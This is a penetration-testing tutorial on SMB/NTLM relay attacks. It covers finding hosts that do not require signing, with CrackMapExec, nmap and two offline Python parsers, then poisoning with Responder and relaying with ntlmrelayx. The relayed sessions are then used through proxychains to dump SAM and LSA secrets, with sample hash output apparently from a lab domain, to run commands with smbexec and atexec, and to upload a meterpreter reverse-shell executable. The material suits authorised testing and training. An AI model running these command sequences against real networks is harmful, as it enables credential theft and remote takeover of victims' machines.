# SMB relay

Instead of cracking captured Net-NTLM hashes to recover the cleartext password, you can relay the authentication itself to other machines and potentially gain access. The relay has to happen live, while the victim is authenticating to you: a Net-NTLMv2 response captured earlier cannot be replayed later.

To refresh your memory on the different NTLM flavours, relaying basics and the pass-the-hash attack, I suggest reading these two posts:

{% embed url="https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html" %}

{% embed url="https://attack.stealthbits.com/pass-the-hash-attack-explained" %}

This attack requires two things:

* SMB signing must not be required on the target. What the tooling below calls "signing disabled" is usually "enabled but not required", which is the Windows default on workstations and member servers; a host that enforces signing rejects the relayed (unsigned) session.
* The relayed user must have rights on the target. You cannot relay authentication back to the machine it came from (reflection was killed by MS08-068), and for code execution the relayed user needs local admin on the target; otherwise you only get what that user can reach, for example an open share.
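What the "signing disabled" check actually looks at is the SecurityMode field of the SMB2 NEGOTIATE response (MS-SMB2, flags 0x0001 SIGNING_ENABLED and 0x0002 SIGNING_REQUIRED). The following is an added example, not code from the page or from any of the tools it mentions: it builds constructed NEGOTIATE responses for three made-up hosts, decodes the flag, and decides which ones are relayable, which is the same decision CrackMapExec and nmap make from a real response.

```python
# Added example (not from the original page): decode the SecurityMode field
# of an SMB2 NEGOTIATE response, which is what the "SMB signing" checks in
# CrackMapExec and nmap's smb2-security-mode script look at. The responses
# below are constructed in-line so this runs offline; the hostnames are made up.
import struct

SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001   # MS-SMB2 2.2.4 SecurityMode flags
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002
SMB2_NEGOTIATE = 0x0000                   # Command value in the SMB2 header


def build_negotiate_response(security_mode: int, dialect: int = 0x0311) -> bytes:
    """Constructed SMB2 NEGOTIATE response (64-byte header + body, without
    the 4-byte direct-TCP length prefix). Only the fields the parser reads
    carry meaningful values; everything else is zeroed."""
    header = struct.pack(
        "<4sHHIHHIIQIIQ16s",
        b"\xfeSMB",       # ProtocolId
        64,               # StructureSize
        0,                # CreditCharge
        0,                # Status
        SMB2_NEGOTIATE,   # Command
        1,                # CreditResponse
        0x00000001,       # Flags: SERVER_TO_REDIR (this is a response)
        0,                # NextCommand
        0,                # MessageId
        0, 0,             # Reserved, TreeId
        0,                # SessionId
        b"\x00" * 16,     # Signature
    )
    body = struct.pack(
        "<HHHH16sIIIIQQHHI",
        65,               # StructureSize: 64 fixed bytes + 1 byte of Buffer
        security_mode,    # SecurityMode
        dialect,          # DialectRevision
        0,                # NegotiateContextCount / Reserved
        b"\x00" * 16,     # ServerGuid
        0, 0, 0, 0,       # Capabilities, MaxTransact/Read/WriteSize
        0, 0,             # SystemTime, ServerStartTime
        128, 0,           # SecurityBufferOffset / Length (empty GSS token)
        0,                # NegotiateContextOffset
    ) + b"\x00"           # Buffer
    return header + body


def negotiate_security_mode(msg: bytes) -> int:
    """Return SecurityMode from an SMB2 NEGOTIATE response; raise on anything else."""
    if len(msg) < 70 or msg[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 message")
    (command,) = struct.unpack_from("<H", msg, 12)          # header.Command
    if command != SMB2_NEGOTIATE:
        raise ValueError(f"command 0x{command:04x} is not NEGOTIATE")
    structure_size, security_mode = struct.unpack_from("<HH", msg, 64)
    if structure_size != 65:
        raise ValueError("NEGOTIATE response StructureSize must be 65")
    return security_mode


def signing_state(security_mode: int) -> str:
    if security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED:
        return "enabled and required"
    if security_mode & SMB2_NEGOTIATE_SIGNING_ENABLED:
        return "enabled but not required"
    return "disabled"


def is_relay_target(security_mode: int) -> bool:
    """Relayable when the server accepts an unsigned session, i.e. the REQUIRED
    flag is clear. 'Enabled but not required' therefore still counts."""
    return not (security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED)


# Constructed responses: a DC (signing enforced), a member server with the
# workstation default, and a legacy box with signing off entirely.
SAMPLE_RESPONSES = {
    "dc01": build_negotiate_response(SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED),
    "fs01": build_negotiate_response(SMB2_NEGOTIATE_SIGNING_ENABLED),
    "win7-a": build_negotiate_response(0),
}


def relay_targets(responses: dict) -> list:
    """Hostnames whose NEGOTIATE response does not require signing."""
    return [host for host, msg in responses.items()
            if is_relay_target(negotiate_security_mode(msg))]


if __name__ == "__main__":
    for host, msg in SAMPLE_RESPONSES.items():
        print(f"{host:8} signing {signing_state(negotiate_security_mode(msg))}")
    print("relay targets:", relay_targets(SAMPLE_RESPONSES))
```

Against a live host you would send an SMB2 NEGOTIATE on 445, strip the 4-byte transport header from the reply and feed the rest to `negotiate_security_mode`; `fs01` here reproduces the "enabled but not required" state that ends up in a relay list even though signing is technically on.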

In order to relay, we need valid targets: as described above, machines that do not require SMB signing. To build that list you can use, for example, [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec), whose `--gen-relay-list` writes one such host per line, ready for ntlmrelayx:

```
cme smb <entire network ip>/<cidr> --gen-relay-list Targets.txt
```

or [Nmap](https://github.com/nmap/nmap), where hosts reported as "Message signing enabled but not required" or "Message signing disabled" are the targets:

```
nmap --script=smb2-security-mode.nse -p445 <entire network ip>
```
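Nmap does not write a relay list for you, so here is an added helper (not part of the page or of nmap) that turns the normal-format output of the scan above into a file usable with `ntlmrelayx.py -tf`. The scan output embedded below is constructed for the demo; the hosts are made up, and the host with port 445 filtered has no script result and is skipped.

```python
# Added example (not from the original page): convert `nmap
# --script=smb2-security-mode -p445 <net>` normal output into a target list
# for ntlmrelayx -tf, keeping only hosts that do not require signing.
# SAMPLE_SCAN is constructed for this demo; the hosts are made up.
import re
import sys

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?\s*$")
SIGNING_RE = re.compile(
    r"Message signing (enabled and required|enabled but not required|disabled)")


def parse_signing(nmap_output: str) -> dict:
    """Map each scanned IP to its signing state. Hosts with no script result
    (445 closed/filtered, SMB1-only box) are recorded as None."""
    state, host = {}, None
    for line in nmap_output.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            state[host] = None
            continue
        m = SIGNING_RE.search(line)
        if m and host:
            state[host] = m.group(1)
    return state


def relay_targets(nmap_output: str) -> list:
    """IPs nmap reports as not requiring signing, in scan order."""
    return [h for h, s in parse_signing(nmap_output).items()
            if s in ("enabled but not required", "disabled")]


def write_target_file(nmap_output: str, path: str) -> int:
    """Write one target per line (the format -tf expects); return the count."""
    targets = relay_targets(nmap_output)
    with open(path, "w") as f:
        f.write("\n".join(targets) + ("\n" if targets else ""))
    return len(targets)


SAMPLE_SCAN = """\
Nmap scan report for dc01.contoso.com (192.168.48.10)
Host is up (0.00050s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for 192.168.48.230
Host is up (0.00040s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for 192.168.48.38
Host is up (0.00060s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing disabled and not required!

Nmap scan report for 192.168.48.224
Host is up (0.00030s latency).

PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
"""

if __name__ == "__main__":
    # Usage: python3 relay_targets.py scan.nmap Targets.txt (no args: demo data)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SCAN
    for host, s in parse_signing(text).items():
        print(f"{host:16} {s or 'no SMB2 signing result'}")
    if len(sys.argv) > 2:
        print("wrote", write_target_file(text, sys.argv[2]), "targets to", sys.argv[2])
    else:
        print("relay targets:", relay_targets(text))
```

Save the scan with `-oN scan.nmap` and run the helper over it; the DC is dropped because it requires signing, which matches the note below.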

**NOTE: domain controllers require SMB signing by default, so they normally do not appear in the relay list; on workstations and member servers the default is "enabled but not required".**

Now on to capturing the authentication. Responder and ntlmrelayx would otherwise compete for the same ports, and the SMB and HTTP connections must reach ntlmrelayx to be relayed, so first turn those two servers off in Responder's configuration file (Responder.conf in the install directory, e.g. /usr/share/responder/ on Kali):

```
[Responder Core]

; Servers to start
SQL = On
; Off: ntlmrelayx must receive the SMB connections on 445
SMB = Off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
; Off: ntlmrelayx must receive the HTTP connections on 80
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
```

Then start Responder, which keeps poisoning LLMNR/NBT-NS but now leaves 445 and 80 alone:

```
python responder.py -I <interface> -rdwv
```

Now for the relay: open a new shell and use [ntlmrelayx.py](https://github.com/SecureAuthCorp/impacket) from impacket to relay the intercepted authentication to the hosts in the target list, keeping each successful session open behind a SOCKS proxy:

```
ntlmrelayx.py -tf Targets.txt -socks -smb2support
```

As victims get poisoned you should see successful relays appearing in the ntlmrelayx window.

Now that's nice, but what can we do with the opened sessions? Type `socks` at the ntlmrelayx prompt and you should see something like this:

```
ntlmrelayx> socks
Protocol  Target          Username                  Port
--------  --------------  ------------------------  ----
SMB       192.168.48.38   VULNERABLE/NORMALUSER3    445
MSSQL     192.168.48.230  VULNERABLE/ADMINISTRATOR  1433
MSSQL     192.168.48.230  CONTOSO/NORMALUSER1       1433
SMB       192.168.48.230  VULNERABLE/ADMINISTRATOR  445
SMB       192.168.48.230  CONTOSO/NORMALUSER1       445
SMTP      192.168.48.224  VULNERABLE/NORMALUSER3    25
SMTP      192.168.48.224  CONTOSO/NORMALUSER1       25
IMAP      192.168.48.224  CONTOSO/NORMALUSER1       143
```

Each row is a live relayed session, identified by protocol, target and relayed user; the SMB session as VULNERABLE/ADMINISTRATOR on 192.168.48.230 is the one that gives admin access. To use these sessions we'll go through [proxychains](https://github.com/haad/proxychains), but first you need to point /etc/proxychains.conf at the SOCKS server ntlmrelayx started on port 1080 (use 127.0.0.1 when proxychains runs on the relay host itself, or the relay host's IP, 192.168.48.1 in the output below, otherwise):

```
[ProxyList]
socks4 <yourIP> 1080
```

With that done you can, for example, dump local hashes with [secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py). The domain and user must match a row of the socks table exactly; when asked for a password just press Enter, because the SOCKS server answers the authentication with the already-relayed session instead of forwarding what you type:

```bash
# proxychains ./secretsdump.py vulnerable/Administrator@192.168.48.230
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

Password:
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa6016dd8f2ac5de40e5a364848ef880c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aeb450b6b165aa734af28891f2bcd2ef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:40cb4af33bac0b739dc821583c91f009:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:ce6b7945a2ee2e8229a543ddf86d3ceb:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
pcadminuser2:6a8bf047b955e0945abb8026b8ce041d:VULNERABLE.CONTOSO.COM:VULNERABLE:::
Administrator:82f6813a7f95f4957a5dc202e5827826:VULNERABLE.CONTOSO.COM:VULNERABLE:::
normaluser1:b18b40534d62d6474f037893111960b9:CONTOSO.COM:CONTOSO:::
serviceaccount:dddb5f4906fd788fc41feb8d485323da:VULNERABLE.CONTOSO.COM:VULNERABLE:::
normaluser3:a24a1688c0d71b251efec801fd1e33b1:VULNERABLE.CONTOSO.COM:VULNERABLE:::
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
VULNERABLE\WIN7-A$:aad3b435b51404eeaad3b435b51404ee:ef1ccd3c502bee484cd575341e4e9a38:::
[*] DPAPI_SYSTEM
 0000   01 00 00 00 1C 17 F6 05  23 2B E5 97 95 E0 E4 DF   ........#+......
 0010   47 96 CC 79 1A C2 6E 14  44 A3 C1 9E 6D 7C 93 F3   G..y..n.D...m|..
 0020   9A EC C6 8A 49 79 20 9D  B5 FB 26 79               ....Iy ...&y
DPAPI_SYSTEM:010000001c17f605232be59795e0e4df4796cc791ac26e1444a3c19e6d7c93f39aecc68a4979209db5fb2679
[*] NL$KM
 0000   EB 5C 93 44 7B 08 65 27  9A D8 36 75 09 A9 CF B3   .\.D{.e'..6u....
 0010   4F AF EC DF 61 63 93 E5  20 C5 4F EF 3C 65 FD 8C   O...ac.. .O.<e..
[...]
```

Or get code execution (the relayed user needs local admin on the target for these) with

[smbexec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py), [atexec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py) and others:

```bash
proxychains smbexec.py <domain>/<relayedUser>@<target>
```

```bash
proxychains atexec.py <domain>/<relayedUser>@<target> "<cmd>"
```

You can also tell ntlmrelayx what to run on each target as soon as a relay succeeds, instead of keeping the session for SOCKS. Leave `-socks` out here: a session handed to the SOCKS server is held open for proxychains and is not used by the attack plugins, so it is one or the other per run. With `-c` the command is executed on the target (and its output printed) whenever the relayed user is admin there:

```bash
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"
```

or have ntlmrelayx upload and run an executable, for example a meterpreter reverse shell payload with a matching Metasploit handler listening:

```bash
ntlmrelayx.py -tf targets.txt -smb2support -e test.exe
```

